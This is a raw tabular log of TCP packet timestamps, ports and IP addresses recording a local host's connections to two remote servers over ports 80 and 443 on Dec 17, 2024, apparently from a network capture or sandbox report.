Dec 17, 2024 07:21:20.011357069 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.011385918 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.011454105 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.019620895 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.019726992 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.019782066 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.019865036 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.028081894 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.028165102 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.028258085 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.028332949 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.036422968 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.036494970 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.036612034 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.036689043 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.044908047 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.045013905 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.045128107 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.045186996 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.053612947 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.053669930 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.053709030 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.053775072 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.061840057 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.061894894 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.061916113 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.061975956 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.070079088 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.070152998 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.070214033 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.070281982 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.182059050 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.182113886 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.182267904 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.183634043 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.183722019 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.183744907 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.183800936 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.188632965 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.188710928 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.188793898 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.192496061 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.192621946 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.192650080 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.192675114 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.197554111 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.197624922 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.197680950 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.197748899 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.202580929 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.202678919 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.202743053 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.202806950 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.207381010 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.207456112 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.207520008 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.207762003 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.212239981 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.212323904 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.212403059 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.212467909 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.217056990 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.217108011 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.217130899 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.217164993 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.221899033 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.221970081 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.222038031 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.222101927 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.227034092 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.227102995 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.227159977 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.227224112 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.231590033 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.231652021 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.231679916 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.231746912 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.236414909 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.236486912 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.236542940 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.236599922 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.241264105 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.241337061 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.241410017 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.241476059 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.246151924 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.246216059 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.246272087 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.246344090 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.250999928 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.251111031 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.251168966 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.251250029 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.255779028 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.255851984 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.255908012 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.255973101 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.260628939 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.260682106 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.260704041 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.260736942 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.265382051 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.265450001 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.374218941 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.374306917 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.374346018 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.374418974 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.376110077 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.376322985 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.376869917 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.376959085 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.377016068 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.377068996 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.380975008 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.381011963 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.381076097 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.381113052 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.384876013 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.384942055 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.385018110 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.385072947 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.388745070 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.388799906 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.392498970 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.392651081 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.396137953 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.396229982 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.396356106 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.399827003 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.399884939 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.400007963 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.403487921 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.403573036 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.403609991 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.403666973 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.407195091 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.407273054 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.407346010 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.407408953 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.410944939 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.410998106 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.411017895 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.411056995 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.414614916 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.414693117 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.414751053 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.414808035 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.418287992 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.418373108 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.418436050 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.418493032 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.422595024 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.422648907 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.422672033 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.422729969 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.425928116 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.426008940 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.426115990 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.426178932 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.429461956 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.429534912 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.429568052 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.429627895 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.433142900 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.433178902 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.433207989 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.433233023 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.436801910 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.436935902 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.437011957 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.437077999 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.440541983 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.440610886 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.440725088 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.440790892 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.444241047 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.444312096 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.444384098 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.444443941 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.447978973 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.448050022 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.448077917 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.448132038 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.451761007 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.451793909 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.451832056 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.451853037 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.455310106 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.455404997 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.455471039 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.455528975 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.459059954 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.459124088 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.459228039 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.459295988 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.462743998 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.462810040 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.462872982 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.462951899 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.466545105 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.466578960 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.466618061 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.466641903 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.470259905 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.470328093 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.470383883 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.470442057 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.473834038 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.473927021 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.473953962 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.474021912 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:20.477613926 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:20.477703094 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:24.812015057 CET	80	49704	172.245.123.12	192.168.2.5
Dec 17, 2024 07:21:24.813936949 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:25.856240988 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:25.856277943 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:25.856501102 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:25.865683079 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:25.865700006 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:26.784380913 CET	49704	80	192.168.2.5	172.245.123.12
Dec 17, 2024 07:21:27.092927933 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.093020916 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.097507954 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.097522020 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.097930908 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.112788916 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.155335903 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.522804022 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.523020983 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.523083925 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.523087025 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.523127079 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.523226976 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.523231983 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.523260117 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.523332119 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.531080008 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.539601088 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.539660931 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.539680004 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.548001051 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.548065901 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.548084021 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.592649937 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.592674017 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.639667988 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.642617941 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.686410904 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.732475042 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.736304045 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.736387968 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.736418009 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.746985912 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.747093916 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.747113943 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.754971981 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.757922888 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.757961035 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.762855053 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.765324116 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.765347004 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.770607948 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.773829937 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.773844004 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.778505087 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.778577089 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.778592110 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.791268110 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.791354895 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.791368961 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.797674894 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.797785997 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.797879934 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.797899961 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.798012018 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.804126024 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.810661077 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.810781956 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.810801029 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.817128897 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.817207098 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.817220926 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.858438969 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.924523115 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.926893950 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.929682016 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.929713011 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.931808949 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.931884050 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.931899071 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.936736107 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.937794924 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.937809944 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.946717978 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.946830034 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.946902037 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.946921110 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.949800968 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.951159000 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978610039 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978635073 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978686094 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978692055 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.978734970 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978763103 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.978763103 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978782892 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978801966 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:27.978984118 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:27.979001045 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.010030031 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.010080099 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.010103941 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.010117054 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.010160923 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.010185957 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.010219097 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.010219097 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.010219097 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.061362982 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.118527889 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.118539095 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.118591070 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.118618965 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.118613958 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.118657112 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.118688107 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.118688107 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.118774891 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.143594980 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.143619061 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.143659115 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.143690109 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.143690109 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.143717051 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.143744946 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.143903971 CET	49706	443	192.168.2.5	151.101.1.137
Dec 17, 2024 07:21:28.165659904 CET	443	49706	151.101.1.137	192.168.2.5
Dec 17, 2024 07:21:28.165703058 CET	443	49706	151.101.1.137	192.168.2.5
